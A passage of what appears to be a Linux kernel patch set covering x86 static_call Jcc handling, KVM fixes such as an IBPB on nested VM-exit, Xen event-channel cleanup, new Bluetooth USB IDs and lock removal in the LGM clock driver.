++	if (insn[0] == 0x0f) {
++		u8 tmp = insn[1];
++		if ((tmp & 0xf0) == 0x80)
++			ret = tmp;
++	}
++
++	return ret;
++}
++
++extern void __static_call_return(void);
++
++asm (".global __static_call_return\n\t"
++     ".type __static_call_return, @function\n\t"
++     "__static_call_return:\n\t"
++     ANNOTATE_NOENDBR
++     ANNOTATE_RETPOLINE_SAFE
++     "ret; int3\n\t"
++     ".size __static_call_return, . - __static_call_return \n\t");
++
+ static void __ref __static_call_transform(void *insn, enum insn_type type,
+ 					  void *func, bool modinit)
+ {
+ 	const void *emulate = NULL;
+ 	int size = CALL_INSN_SIZE;
+ 	const void *code;
++	u8 op, buf[6];
++
++	if ((type == JMP || type == RET) && (op = __is_Jcc(insn)))
++		type = JCC;
+ 
+ 	switch (type) {
+ 	case CALL:
+@@ -56,6 +84,20 @@ static void __ref __static_call_transform(void *insn, enum insn_type type,
+ 		else
+ 			code = &retinsn;
+ 		break;
++
++	case JCC:
++		if (!func) {
++			func = __static_call_return;
++			if (cpu_feature_enabled(X86_FEATURE_RETHUNK))
++				func = __x86_return_thunk;
++		}
++
++		buf[0] = 0x0f;
++		__text_gen_insn(buf+1, op, insn+1, func, 5);
++		code = buf;
++		size = 6;
++
++		break;
+ 	}
+ 
+ 	if (memcmp(insn, code, size) == 0)
+@@ -67,9 +109,9 @@ static void __ref __static_call_transform(void *insn, enum insn_type type,
+ 	text_poke_bp(insn, code, size, emulate);
+ }
+ 
+-static void __static_call_validate(void *insn, bool tail, bool tramp)
++static void __static_call_validate(u8 *insn, bool tail, bool tramp)
+ {
+-	u8 opcode = *(u8 *)insn;
++	u8 opcode = insn[0];
+ 
+ 	if (tramp && memcmp(insn+5, tramp_ud, 3)) {
+ 		pr_err("trampoline signature fail");
+@@ -78,7 +120,8 @@ static void __static_call_validate(void *insn, bool tail, bool tramp)
+ 
+ 	if (tail) {
+ 		if (opcode == JMP32_INSN_OPCODE ||
+-		    opcode == RET_INSN_OPCODE)
++		    opcode == RET_INSN_OPCODE ||
++		    __is_Jcc(insn))
+ 			return;
+ 	} else {
+ 		if (opcode == CALL_INSN_OPCODE ||
+diff --git a/arch/x86/kvm/svm/svm.c b/arch/x86/kvm/svm/svm.c
+index ce362e88a5676..0434bb7b456bd 100644
+--- a/arch/x86/kvm/svm/svm.c
++++ b/arch/x86/kvm/svm/svm.c
+@@ -3889,8 +3889,14 @@ static int svm_vcpu_pre_run(struct kvm_vcpu *vcpu)
+ 
+ static fastpath_t svm_exit_handlers_fastpath(struct kvm_vcpu *vcpu)
+ {
+-	if (to_svm(vcpu)->vmcb->control.exit_code == SVM_EXIT_MSR &&
+-	    to_svm(vcpu)->vmcb->control.exit_info_1)
++	struct vmcb_control_area *control = &to_svm(vcpu)->vmcb->control;
++
++	/*
++	 * Note, the next RIP must be provided as SRCU isn't held, i.e. KVM
++	 * can't read guest memory (dereference memslots) to decode the WRMSR.
++	 */
++	if (control->exit_code == SVM_EXIT_MSR && control->exit_info_1 &&
++	    nrips && control->next_rip)
+ 		return handle_fastpath_set_msr_irqoff(vcpu);
+ 
+ 	return EXIT_FASTPATH_NONE;
+diff --git a/arch/x86/kvm/vmx/nested.c b/arch/x86/kvm/vmx/nested.c
+index 10c63b1bf92fa..df8995977ec2d 100644
+--- a/arch/x86/kvm/vmx/nested.c
++++ b/arch/x86/kvm/vmx/nested.c
+@@ -4767,6 +4767,17 @@ void nested_vmx_vmexit(struct kvm_vcpu *vcpu, u32 vm_exit_reason,
+ 
+ 	vmx_switch_vmcs(vcpu, &vmx->vmcs01);
+ 
++	/*
++	 * If IBRS is advertised to the vCPU, KVM must flush the indirect
++	 * branch predictors when transitioning from L2 to L1, as L1 expects
++	 * hardware (KVM in this case) to provide separate predictor modes.
++	 * Bare metal isolates VMX root (host) from VMX non-root (guest), but
++	 * doesn't isolate different VMCSs, i.e. in this case, doesn't provide
++	 * separate modes for L2 vs L1.
++	 */
++	if (guest_cpuid_has(vcpu, X86_FEATURE_SPEC_CTRL))
++		indirect_branch_prediction_barrier();
++
+ 	/* Update any VMCS fields that might have changed while L2 ran */
+ 	vmcs_write32(VM_EXIT_MSR_LOAD_COUNT, vmx->msr_autoload.host.nr);
+ 	vmcs_write32(VM_ENTRY_MSR_LOAD_COUNT, vmx->msr_autoload.guest.nr);
+diff --git a/arch/x86/kvm/vmx/vmx.c b/arch/x86/kvm/vmx/vmx.c
+index 4ae248e87f5ed..95ed874fbbcc3 100644
+--- a/arch/x86/kvm/vmx/vmx.c
++++ b/arch/x86/kvm/vmx/vmx.c
+@@ -1348,8 +1348,10 @@ void vmx_vcpu_load_vmcs(struct kvm_vcpu *vcpu, int cpu,
+ 
+ 		/*
+ 		 * No indirect branch prediction barrier needed when switching
+-		 * the active VMCS within a guest, e.g. on nested VM-Enter.
+-		 * The L1 VMM can protect itself with retpolines, IBPB or IBRS.
++		 * the active VMCS within a vCPU, unless IBRS is advertised to
++		 * the vCPU.  To minimize the number of IBPBs executed, KVM
++		 * performs IBPB on nested VM-Exit (a single nested transition
++		 * may switch the active VMCS multiple times).
+ 		 */
+ 		if (!buddy || WARN_ON_ONCE(buddy->vmcs != prev))
+ 			indirect_branch_prediction_barrier();
+diff --git a/arch/x86/kvm/x86.c b/arch/x86/kvm/x86.c
+index 05ca303d7fd98..68827b8dc37a5 100644
+--- a/arch/x86/kvm/x86.c
++++ b/arch/x86/kvm/x86.c
+@@ -8860,7 +8860,9 @@ int x86_emulate_instruction(struct kvm_vcpu *vcpu, gpa_t cr2_or_gpa,
+ 						  write_fault_to_spt,
+ 						  emulation_type))
+ 				return 1;
+-			if (ctxt->have_exception) {
++
++			if (ctxt->have_exception &&
++			    !(emulation_type & EMULTYPE_SKIP)) {
+ 				/*
+ 				 * #UD should result in just EMULATION_FAILED, and trap-like
+ 				 * exception should not be encountered during decode.
+diff --git a/arch/x86/kvm/xen.c b/arch/x86/kvm/xen.c
+index f3098c0e386a8..a58a426e6b1c0 100644
+--- a/arch/x86/kvm/xen.c
++++ b/arch/x86/kvm/xen.c
+@@ -1757,18 +1757,42 @@ static int kvm_xen_eventfd_deassign(struct kvm *kvm, u32 port)
+ 
+ static int kvm_xen_eventfd_reset(struct kvm *kvm)
+ {
+-	struct evtchnfd *evtchnfd;
++	struct evtchnfd *evtchnfd, **all_evtchnfds;
+ 	int i;
++	int n = 0;
+ 
+ 	mutex_lock(&kvm->lock);
++
++	/*
++	 * Because synchronize_srcu() cannot be called inside the
++	 * critical section, first collect all the evtchnfd objects
++	 * in an array as they are removed from evtchn_ports.
++	 */
++	idr_for_each_entry(&kvm->arch.xen.evtchn_ports, evtchnfd, i)
++		n++;
++
++	all_evtchnfds = kmalloc_array(n, sizeof(struct evtchnfd *), GFP_KERNEL);
++	if (!all_evtchnfds) {
++		mutex_unlock(&kvm->lock);
++		return -ENOMEM;
++	}
++
++	n = 0;
+ 	idr_for_each_entry(&kvm->arch.xen.evtchn_ports, evtchnfd, i) {
++		all_evtchnfds[n++] = evtchnfd;
+ 		idr_remove(&kvm->arch.xen.evtchn_ports, evtchnfd->send_port);
+-		synchronize_srcu(&kvm->srcu);
++	}
++	mutex_unlock(&kvm->lock);
++
++	synchronize_srcu(&kvm->srcu);
++
++	while (n--) {
++		evtchnfd = all_evtchnfds[n];
+ 		if (!evtchnfd->deliver.port.port)
+ 			eventfd_ctx_put(evtchnfd->deliver.eventfd.ctx);
+ 		kfree(evtchnfd);
+ 	}
+-	mutex_unlock(&kvm->lock);
++	kfree(all_evtchnfds);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/bluetooth/btusb.c b/drivers/bluetooth/btusb.c
+index 6beafd62d7226..93e9ae928e4e8 100644
+--- a/drivers/bluetooth/btusb.c
++++ b/drivers/bluetooth/btusb.c
+@@ -316,6 +316,90 @@ static const struct usb_device_id blacklist_table[] = {
+ 	{ USB_DEVICE(0x0489, 0xe0d0), .driver_info = BTUSB_QCA_WCN6855 |
+ 						     BTUSB_WIDEBAND_SPEECH |
+ 						     BTUSB_VALID_LE_STATES },
++	{ USB_DEVICE(0x10ab, 0x9108), .driver_info = BTUSB_QCA_WCN6855 |
++						     BTUSB_WIDEBAND_SPEECH |
++						     BTUSB_VALID_LE_STATES },
++	{ USB_DEVICE(0x10ab, 0x9109), .driver_info = BTUSB_QCA_WCN6855 |
++						     BTUSB_WIDEBAND_SPEECH |
++						     BTUSB_VALID_LE_STATES },
++	{ USB_DEVICE(0x10ab, 0x9208), .driver_info = BTUSB_QCA_WCN6855 |
++						     BTUSB_WIDEBAND_SPEECH |
++						     BTUSB_VALID_LE_STATES },
++	{ USB_DEVICE(0x10ab, 0x9209), .driver_info = BTUSB_QCA_WCN6855 |
++						     BTUSB_WIDEBAND_SPEECH |
++						     BTUSB_VALID_LE_STATES },
++	{ USB_DEVICE(0x10ab, 0x9308), .driver_info = BTUSB_QCA_WCN6855 |
++						     BTUSB_WIDEBAND_SPEECH |
++						     BTUSB_VALID_LE_STATES },
++	{ USB_DEVICE(0x10ab, 0x9408), .driver_info = BTUSB_QCA_WCN6855 |
++						     BTUSB_WIDEBAND_SPEECH |
++						     BTUSB_VALID_LE_STATES },
++	{ USB_DEVICE(0x10ab, 0x9508), .driver_info = BTUSB_QCA_WCN6855 |
++						     BTUSB_WIDEBAND_SPEECH |
++						     BTUSB_VALID_LE_STATES },
++	{ USB_DEVICE(0x10ab, 0x9509), .driver_info = BTUSB_QCA_WCN6855 |
++						     BTUSB_WIDEBAND_SPEECH |
++						     BTUSB_VALID_LE_STATES },
++	{ USB_DEVICE(0x10ab, 0x9608), .driver_info = BTUSB_QCA_WCN6855 |
++						     BTUSB_WIDEBAND_SPEECH |
++						     BTUSB_VALID_LE_STATES },
++	{ USB_DEVICE(0x10ab, 0x9609), .driver_info = BTUSB_QCA_WCN6855 |
++						     BTUSB_WIDEBAND_SPEECH |
++						     BTUSB_VALID_LE_STATES },
++	{ USB_DEVICE(0x10ab, 0x9f09), .driver_info = BTUSB_QCA_WCN6855 |
++						     BTUSB_WIDEBAND_SPEECH |
++						     BTUSB_VALID_LE_STATES },
++	{ USB_DEVICE(0x04ca, 0x3022), .driver_info = BTUSB_QCA_WCN6855 |
++						     BTUSB_WIDEBAND_SPEECH |
++						     BTUSB_VALID_LE_STATES },
++	{ USB_DEVICE(0x0489, 0xe0c7), .driver_info = BTUSB_QCA_WCN6855 |
++						     BTUSB_WIDEBAND_SPEECH |
++						     BTUSB_VALID_LE_STATES },
++	{ USB_DEVICE(0x0489, 0xe0c9), .driver_info = BTUSB_QCA_WCN6855 |
++						     BTUSB_WIDEBAND_SPEECH |
++						     BTUSB_VALID_LE_STATES },
++	{ USB_DEVICE(0x0489, 0xe0ca), .driver_info = BTUSB_QCA_WCN6855 |
++						     BTUSB_WIDEBAND_SPEECH |
++						     BTUSB_VALID_LE_STATES },
++	{ USB_DEVICE(0x0489, 0xe0cb), .driver_info = BTUSB_QCA_WCN6855 |
++						     BTUSB_WIDEBAND_SPEECH |
++						     BTUSB_VALID_LE_STATES },
++	{ USB_DEVICE(0x0489, 0xe0ce), .driver_info = BTUSB_QCA_WCN6855 |
++						     BTUSB_WIDEBAND_SPEECH |
++						     BTUSB_VALID_LE_STATES },
++	{ USB_DEVICE(0x0489, 0xe0de), .driver_info = BTUSB_QCA_WCN6855 |
++						     BTUSB_WIDEBAND_SPEECH |
++						     BTUSB_VALID_LE_STATES },
++	{ USB_DEVICE(0x0489, 0xe0df), .driver_info = BTUSB_QCA_WCN6855 |
++						     BTUSB_WIDEBAND_SPEECH |
++						     BTUSB_VALID_LE_STATES },
++	{ USB_DEVICE(0x0489, 0xe0e1), .driver_info = BTUSB_QCA_WCN6855 |
++						     BTUSB_WIDEBAND_SPEECH |
++						     BTUSB_VALID_LE_STATES },
++	{ USB_DEVICE(0x0489, 0xe0ea), .driver_info = BTUSB_QCA_WCN6855 |
++						     BTUSB_WIDEBAND_SPEECH |
++						     BTUSB_VALID_LE_STATES },
++	{ USB_DEVICE(0x0489, 0xe0ec), .driver_info = BTUSB_QCA_WCN6855 |
++						     BTUSB_WIDEBAND_SPEECH |
++						     BTUSB_VALID_LE_STATES },
++	{ USB_DEVICE(0x04ca, 0x3023), .driver_info = BTUSB_QCA_WCN6855 |
++						     BTUSB_WIDEBAND_SPEECH |
++						     BTUSB_VALID_LE_STATES },
++	{ USB_DEVICE(0x04ca, 0x3024), .driver_info = BTUSB_QCA_WCN6855 |
++						     BTUSB_WIDEBAND_SPEECH |
++						     BTUSB_VALID_LE_STATES },
++	{ USB_DEVICE(0x04ca, 0x3a22), .driver_info = BTUSB_QCA_WCN6855 |
++						     BTUSB_WIDEBAND_SPEECH |
++						     BTUSB_VALID_LE_STATES },
++	{ USB_DEVICE(0x04ca, 0x3a24), .driver_info = BTUSB_QCA_WCN6855 |
++						     BTUSB_WIDEBAND_SPEECH |
++						     BTUSB_VALID_LE_STATES },
++	{ USB_DEVICE(0x04ca, 0x3a26), .driver_info = BTUSB_QCA_WCN6855 |
++						     BTUSB_WIDEBAND_SPEECH |
++						     BTUSB_VALID_LE_STATES },
++	{ USB_DEVICE(0x04ca, 0x3a27), .driver_info = BTUSB_QCA_WCN6855 |
++						     BTUSB_WIDEBAND_SPEECH |
++						     BTUSB_VALID_LE_STATES },
+ 
+ 	/* QCA WCN785x chipset */
+ 	{ USB_DEVICE(0x0cf3, 0xe700), .driver_info = BTUSB_QCA_WCN6855 |
+diff --git a/drivers/clk/x86/Kconfig b/drivers/clk/x86/Kconfig
+index 69642e15fcc1f..ced99e082e3dd 100644
+--- a/drivers/clk/x86/Kconfig
++++ b/drivers/clk/x86/Kconfig
+@@ -1,8 +1,9 @@
+ # SPDX-License-Identifier: GPL-2.0-only
+ config CLK_LGM_CGU
+ 	depends on OF && HAS_IOMEM && (X86 || COMPILE_TEST)
++	select MFD_SYSCON
+ 	select OF_EARLY_FLATTREE
+ 	bool "Clock driver for Lightning Mountain(LGM) platform"
+ 	help
+-	  Clock Generation Unit(CGU) driver for Intel Lightning Mountain(LGM)
+-	  network processor SoC.
++	  Clock Generation Unit(CGU) driver for MaxLinear's x86 based
++	  Lightning Mountain(LGM) network processor SoC.
+diff --git a/drivers/clk/x86/clk-cgu-pll.c b/drivers/clk/x86/clk-cgu-pll.c
+index 3179557b5f784..409dbf55f4cae 100644
+--- a/drivers/clk/x86/clk-cgu-pll.c
++++ b/drivers/clk/x86/clk-cgu-pll.c
+@@ -1,8 +1,9 @@
+ // SPDX-License-Identifier: GPL-2.0
+ /*
++ * Copyright (C) 2020-2022 MaxLinear, Inc.
+  * Copyright (C) 2020 Intel Corporation.
+- * Zhu YiXin <yixin.zhu@intel.com>
+- * Rahul Tanwar <rahul.tanwar@intel.com>
++ * Zhu Yixin <yzhu@maxlinear.com>
++ * Rahul Tanwar <rtanwar@maxlinear.com>
+  */
+ 
+ #include <linux/clk-provider.h>
+@@ -40,13 +41,10 @@ static unsigned long lgm_pll_recalc_rate(struct clk_hw *hw, unsigned long prate)
+ {
+ 	struct lgm_clk_pll *pll = to_lgm_clk_pll(hw);
+ 	unsigned int div, mult, frac;
+-	unsigned long flags;
+ 
+-	spin_lock_irqsave(&pll->lock, flags);
+ 	mult = lgm_get_clk_val(pll->membase, PLL_REF_DIV(pll->reg), 0, 12);
+ 	div = lgm_get_clk_val(pll->membase, PLL_REF_DIV(pll->reg), 18, 6);
+ 	frac = lgm_get_clk_val(pll->membase, pll->reg, 2, 24);
+-	spin_unlock_irqrestore(&pll->lock, flags);
+ 
+ 	if (pll->type == TYPE_LJPLL)
+ 		div *= 4;
+@@ -57,12 +55,9 @@ static unsigned long lgm_pll_recalc_rate(struct clk_hw *hw, unsigned long prate)
+ static int lgm_pll_is_enabled(struct clk_hw *hw)
+ {
+ 	struct lgm_clk_pll *pll = to_lgm_clk_pll(hw);
+-	unsigned long flags;
+ 	unsigned int ret;
+ 
+-	spin_lock_irqsave(&pll->lock, flags);
+ 	ret = lgm_get_clk_val(pll->membase, pll->reg, 0, 1);
+-	spin_unlock_irqrestore(&pll->lock, flags);
+ 
+ 	return ret;
+ }
+@@ -70,15 +65,13 @@ static int lgm_pll_is_enabled(struct clk_hw *hw)
+ static int lgm_pll_enable(struct clk_hw *hw)
+ {
+ 	struct lgm_clk_pll *pll = to_lgm_clk_pll(hw);
+-	unsigned long flags;
+ 	u32 val;
+ 	int ret;
+ 
+-	spin_lock_irqsave(&pll->lock, flags);
+ 	lgm_set_clk_val(pll->membase, pll->reg, 0, 1, 1);
+-	ret = readl_poll_timeout_atomic(pll->membase + pll->reg,
+-					val, (val & 0x1), 1, 100);
+-	spin_unlock_irqrestore(&pll->lock, flags);
++	ret = regmap_read_poll_timeout_atomic(pll->membase, pll->reg,
++					      val, (val & 0x1), 1, 100);
++
+ 
+ 	return ret;
+ }
+@@ -86,11 +79,8 @@ static int lgm_pll_enable(struct clk_hw *hw)
+ static void lgm_pll_disable(struct clk_hw *hw)
+ {
+ 	struct lgm_clk_pll *pll = to_lgm_clk_pll(hw);
+-	unsigned long flags;
+ 
+-	spin_lock_irqsave(&pll->lock, flags);
+ 	lgm_set_clk_val(pll->membase, pll->reg, 0, 1, 0);
+-	spin_unlock_irqrestore(&pll->lock, flags);
+ }
+ 
+ static const struct clk_ops lgm_pll_ops = {
+@@ -121,7 +111,6 @@ lgm_clk_register_pll(struct lgm_clk_provider *ctx,
+ 		return ERR_PTR(-ENOMEM);
+ 
+ 	pll->membase = ctx->membase;
+-	pll->lock = ctx->lock;
+ 	pll->reg = list->reg;
+ 	pll->flags = list->flags;
+ 	pll->type = list->type;
+diff --git a/drivers/clk/x86/clk-cgu.c b/drivers/clk/x86/clk-cgu.c
+index 33de600e0c38e..89b53f280aee0 100644
+--- a/drivers/clk/x86/clk-cgu.c
++++ b/drivers/clk/x86/clk-cgu.c
+@@ -1,8 +1,9 @@
+ // SPDX-License-Identifier: GPL-2.0
+ /*
++ * Copyright (C) 2020-2022 MaxLinear, Inc.
+  * Copyright (C) 2020 Intel Corporation.
+- * Zhu YiXin <yixin.zhu@intel.com>
+- * Rahul Tanwar <rahul.tanwar@intel.com>
++ * Zhu Yixin <yzhu@maxlinear.com>
++ * Rahul Tanwar <rtanwar@maxlinear.com>
+  */
+ #include <linux/clk-provider.h>
+ #include <linux/device.h>
+@@ -24,14 +25,10 @@
+ static struct clk_hw *lgm_clk_register_fixed(struct lgm_clk_provider *ctx,
+ 					     const struct lgm_clk_branch *list)
+ {
+-	unsigned long flags;
+ 
+-	if (list->div_flags & CLOCK_FLAG_VAL_INIT) {
+-		spin_lock_irqsave(&ctx->lock, flags);
++	if (list->div_flags & CLOCK_FLAG_VAL_INIT)
+ 		lgm_set_clk_val(ctx->membase, list->div_off, list->div_shift,
+ 				list->div_width, list->div_val);
+-		spin_unlock_irqrestore(&ctx->lock, flags);
+-	}
+ 
+ 	return clk_hw_register_fixed_rate(NULL, list->name,
+ 					  list->parent_data[0].name,
+@@ -41,33 +38,27 @@ static struct clk_hw *lgm_clk_register_fixed(struct lgm_clk_provider *ctx,
+ static u8 lgm_clk_mux_get_parent(struct clk_hw *hw)
+ {
+ 	struct lgm_clk_mux *mux = to_lgm_clk_mux(hw);
+-	unsigned long flags;
+ 	u32 val;
+ 
+-	spin_lock_irqsave(&mux->lock, flags);
+ 	if (mux->flags & MUX_CLK_SW)
+ 		val = mux->reg;
+ 	else
+ 		val = lgm_get_clk_val(mux->membase, mux->reg, mux->shift,
+ 				      mux->width);
+-	spin_unlock_irqrestore(&mux->lock, flags);
+ 	return clk_mux_val_to_index(hw, NULL, mux->flags, val);
+ }
+ 
+ static int lgm_clk_mux_set_parent(struct clk_hw *hw, u8 index)
+ {
+ 	struct lgm_clk_mux *mux = to_lgm_clk_mux(hw);
+-	unsigned long flags;
+ 	u32 val;
+ 
+ 	val = clk_mux_index_to_val(NULL, mux->flags, index);
+-	spin_lock_irqsave(&mux->lock, flags);
+ 	if (mux->flags & MUX_CLK_SW)
+ 		mux->reg = val;
+ 	else
+ 		lgm_set_clk_val(mux->membase, mux->reg, mux->shift,
+ 				mux->width, val);
+-	spin_unlock_irqrestore(&mux->lock, flags);
+ 
+ 	return 0;
+ }
+@@ -90,7 +81,7 @@ static struct clk_hw *
+ lgm_clk_register_mux(struct lgm_clk_provider *ctx,
+ 		     const struct lgm_clk_branch *list)
+ {
+-	unsigned long flags, cflags = list->mux_flags;
++	unsigned long cflags = list->mux_flags;
+ 	struct device *dev = ctx->dev;
+ 	u8 shift = list->mux_shift;
+ 	u8 width = list->mux_width;
+@@ -111,7 +102,6 @@ lgm_clk_register_mux(struct lgm_clk_provider *ctx,
+ 	init.num_parents = list->num_parents;
+ 
+ 	mux->membase = ctx->membase;
+-	mux->lock = ctx->lock;
+ 	mux->reg = reg;
+ 	mux->shift = shift;
+ 	mux->width = width;
+@@ -123,11 +113,8 @@ lgm_clk_register_mux(struct lgm_clk_provider *ctx,
+ 	if (ret)
+ 		return ERR_PTR(ret);
+ 
+-	if (cflags & CLOCK_FLAG_VAL_INIT) {
+-		spin_lock_irqsave(&mux->lock, flags);
++	if (cflags & CLOCK_FLAG_VAL_INIT)
+ 		lgm_set_clk_val(mux->membase, reg, shift, width, list->mux_val);
+-		spin_unlock_irqrestore(&mux->lock, flags);
+-	}
+ 
+ 	return hw;
+ }
+@@ -136,13 +123,10 @@ static unsigned long
+ lgm_clk_divider_recalc_rate(struct clk_hw *hw, unsigned long parent_rate)
+ {
+ 	struct lgm_clk_divider *divider = to_lgm_clk_divider(hw);
+-	unsigned long flags;
+ 	unsigned int val;
+ 
+-	spin_lock_irqsave(&divider->lock, flags);
+ 	val = lgm_get_clk_val(divider->membase, divider->reg,
+ 			      divider->shift, divider->width);
+-	spin_unlock_irqrestore(&divider->lock, flags);
+ 
+ 	return divider_recalc_rate(hw, parent_rate, val, divider->table,
+ 				   divider->flags, divider->width);
+@@ -163,7 +147,6 @@ lgm_clk_divider_set_rate(struct clk_hw *hw, unsigned long rate,
+ 			 unsigned long prate)
+ {
+ 	struct lgm_clk_divider *divider = to_lgm_clk_divider(hw);
+-	unsigned long flags;
+ 	int value;
+ 
+ 	value = divider_get_val(rate, prate, divider->table,
+@@ -171,10 +154,8 @@ lgm_clk_divider_set_rate(struct clk_hw *hw, unsigned long rate,
+ 	if (value < 0)
+ 		return value;
+ 
+-	spin_lock_irqsave(&divider->lock, flags);
+ 	lgm_set_clk_val(divider->membase, divider->reg,
+ 			divider->shift, divider->width, value);
+-	spin_unlock_irqrestore(&divider->lock, flags);
+ 
+ 	return 0;
+ }
+@@ -182,12 +163,10 @@ lgm_clk_divider_set_rate(struct clk_hw *hw, unsigned long rate,
+ static int lgm_clk_divider_enable_disable(struct clk_hw *hw, int enable)
+ {
+ 	struct lgm_clk_divider *div = to_lgm_clk_divider(hw);
+-	unsigned long flags;
+ 
+-	spin_lock_irqsave(&div->lock, flags);
+-	lgm_set_clk_val(div->membase, div->reg, div->shift_gate,
+-			div->width_gate, enable);
+-	spin_unlock_irqrestore(&div->lock, flags);
++	if (div->flags != DIV_CLK_NO_MASK)
++		lgm_set_clk_val(div->membase, div->reg, div->shift_gate,
++				div->width_gate, enable);
+ 	return 0;
+ }
+ 
+@@ -213,7 +192,7 @@ static struct clk_hw *
+ lgm_clk_register_divider(struct lgm_clk_provider *ctx,
+ 			 const struct lgm_clk_branch *list)
+ {
+-	unsigned long flags, cflags = list->div_flags;
++	unsigned long cflags = list->div_flags;
+ 	struct device *dev = ctx->dev;
+ 	struct lgm_clk_divider *div;
+ 	struct clk_init_data init = {};
+@@ -236,7 +215,6 @@ lgm_clk_register_divider(struct lgm_clk_provider *ctx,
+ 	init.num_parents = 1;
+ 
+ 	div->membase = ctx->membase;
+-	div->lock = ctx->lock;
+ 	div->reg = reg;
+ 	div->shift = shift;
+ 	div->width = width;
+@@ -251,11 +229,8 @@ lgm_clk_register_divider(struct lgm_clk_provider *ctx,
+ 	if (ret)
+ 		return ERR_PTR(ret);
+ 
+-	if (cflags & CLOCK_FLAG_VAL_INIT) {
+-		spin_lock_irqsave(&div->lock, flags);
++	if (cflags & CLOCK_FLAG_VAL_INIT)
+ 		lgm_set_clk_val(div->membase, reg, shift, width, list->div_val);
+-		spin_unlock_irqrestore(&div->lock, flags);
+-	}
+ 
+ 	return hw;
+ }
+@@ -264,7 +239,6 @@ static struct clk_hw *
+ lgm_clk_register_fixed_factor(struct lgm_clk_provider *ctx,
+ 			      const struct lgm_clk_branch *list)
+ {
+-	unsigned long flags;
+ 	struct clk_hw *hw;
+ 
+ 	hw = clk_hw_register_fixed_factor(ctx->dev, list->name,
+@@ -273,12 +247,9 @@ lgm_clk_register_fixed_factor(struct lgm_clk_provider *ctx,
+ 	if (IS_ERR(hw))
+ 		return ERR_CAST(hw);
+ 
+-	if (list->div_flags & CLOCK_FLAG_VAL_INIT) {
+-		spin_lock_irqsave(&ctx->lock, flags);
++	if (list->div_flags & CLOCK_FLAG_VAL_INIT)
+ 		lgm_set_clk_val(ctx->membase, list->div_off, list->div_shift,
+ 				list->div_width, list->div_val);
+-		spin_unlock_irqrestore(&ctx->lock, flags);
+-	}
+ 
+ 	return hw;
+ }
+@@ -286,13 +257,10 @@ lgm_clk_register_fixed_factor(struct lgm_clk_provider *ctx,
+ static int lgm_clk_gate_enable(struct clk_hw *hw)
+ {
+ 	struct lgm_clk_gate *gate = to_lgm_clk_gate(hw);
+-	unsigned long flags;
+ 	unsigned int reg;
+ 
+-	spin_lock_irqsave(&gate->lock, flags);
+ 	reg = GATE_HW_REG_EN(gate->reg);
+ 	lgm_set_clk_val(gate->membase, reg, gate->shift, 1, 1);
+-	spin_unlock_irqrestore(&gate->lock, flags);
+ 
+ 	return 0;
+ }
+@@ -300,25 +268,19 @@ static int lgm_clk_gate_enable(struct clk_hw *hw)
+ static void lgm_clk_gate_disable(struct clk_hw *hw)
+ {
+ 	struct lgm_clk_gate *gate = to_lgm_clk_gate(hw);
+-	unsigned long flags;
+ 	unsigned int reg;
+ 
+-	spin_lock_irqsave(&gate->lock, flags);
+ 	reg = GATE_HW_REG_DIS(gate->reg);
+ 	lgm_set_clk_val(gate->membase, reg, gate->shift, 1, 1);
+-	spin_unlock_irqrestore(&gate->lock, flags);
+ }
+ 
+ static int lgm_clk_gate_is_enabled(struct clk_hw *hw)
+ {
+ 	struct lgm_clk_gate *gate = to_lgm_clk_gate(hw);
+ 	unsigned int reg, ret;
+-	unsigned long flags;
+ 
+-	spin_lock_irqsave(&gate->lock, flags);
+ 	reg = GATE_HW_REG_STAT(gate->reg);
+ 	ret = lgm_get_clk_val(gate->membase, reg, gate->shift, 1);
+-	spin_unlock_irqrestore(&gate->lock, flags);
+ 
+ 	return ret;
+ }
+@@ -333,7 +295,7 @@ static struct clk_hw *
+ lgm_clk_register_gate(struct lgm_clk_provider *ctx,
+ 		      const struct lgm_clk_branch *list)
+ {
+-	unsigned long flags, cflags = list->gate_flags;
++	unsigned long cflags = list->gate_flags;
+ 	const char *pname = list->parent_data[0].name;
+ 	struct device *dev = ctx->dev;
+ 	u8 shift = list->gate_shift;
+@@ -354,7 +316,6 @@ lgm_clk_register_gate(struct lgm_clk_provider *ctx,
+ 	init.num_parents = pname ? 1 : 0;
+ 
+ 	gate->membase = ctx->membase;
+-	gate->lock = ctx->lock;
+ 	gate->reg = reg;
+ 	gate->shift = shift;
+ 	gate->flags = cflags;
+@@ -366,9 +327,7 @@ lgm_clk_register_gate(struct lgm_clk_provider *ctx,
+ 		return ERR_PTR(ret);
+ 
+ 	if (cflags & CLOCK_FLAG_VAL_INIT) {
+-		spin_lock_irqsave(&gate->lock, flags);
+ 		lgm_set_clk_val(gate->membase, reg, shift, 1, list->gate_val);
+-		spin_unlock_irqrestore(&gate->lock, flags);
+ 	}
+ 
+ 	return hw;
+@@ -396,8 +355,22 @@ int lgm_clk_register_branches(struct lgm_clk_provider *ctx,
+ 			hw = lgm_clk_register_fixed_factor(ctx, list);
+ 			break;
+ 		case CLK_TYPE_GATE:
+-			hw = lgm_clk_register_gate(ctx, list);
++			if (list->gate_flags & GATE_CLK_HW) {
++				hw = lgm_clk_register_gate(ctx, list);
++			} else {
++				/*
++				 * GATE_CLKs can be controlled either from
++				 * CGU clk driver i.e. this driver or directly
++				 * from power management driver/daemon. It is
++				 * dependent on the power policy/profile requirements
++				 * of the end product. To override control of gate
++				 * clks from this driver, provide NULL for this index
++				 * of gate clk provider.
++				 */
++				hw = NULL;
++			}
+ 			break;
++
+ 		default:
+ 			dev_err(ctx->dev, "invalid clk type\n");
+ 			return -EINVAL;
+@@ -443,24 +416,18 @@ lgm_clk_ddiv_recalc_rate(struct clk_hw *hw, unsigned long parent_rate)
+ static int lgm_clk_ddiv_enable(struct clk_hw *hw)
+ {
+ 	struct lgm_clk_ddiv *ddiv = to_lgm_clk_ddiv(hw);
+-	unsigned long flags;
+ 
+-	spin_lock_irqsave(&ddiv->lock, flags);
+ 	lgm_set_clk_val(ddiv->membase, ddiv->reg, ddiv->shift_gate,
+ 			ddiv->width_gate, 1);
+-	spin_unlock_irqrestore(&ddiv->lock, flags);
+ 	return 0;
+ }
+ 
+ static void lgm_clk_ddiv_disable(struct clk_hw *hw)
+ {
+ 	struct lgm_clk_ddiv *ddiv = to_lgm_clk_ddiv(hw);
+-	unsigned long flags;
+ 
+-	spin_lock_irqsave(&ddiv->lock, flags);
+ 	lgm_set_clk_val(ddiv->membase, ddiv->reg, ddiv->shift_gate,
+ 			ddiv->width_gate, 0);
+-	spin_unlock_irqrestore(&ddiv->lock, flags);
+ }
+ 
+ static int
+@@ -497,32 +464,25 @@ lgm_clk_ddiv_set_rate(struct clk_hw *hw, unsigned long rate,
+ {
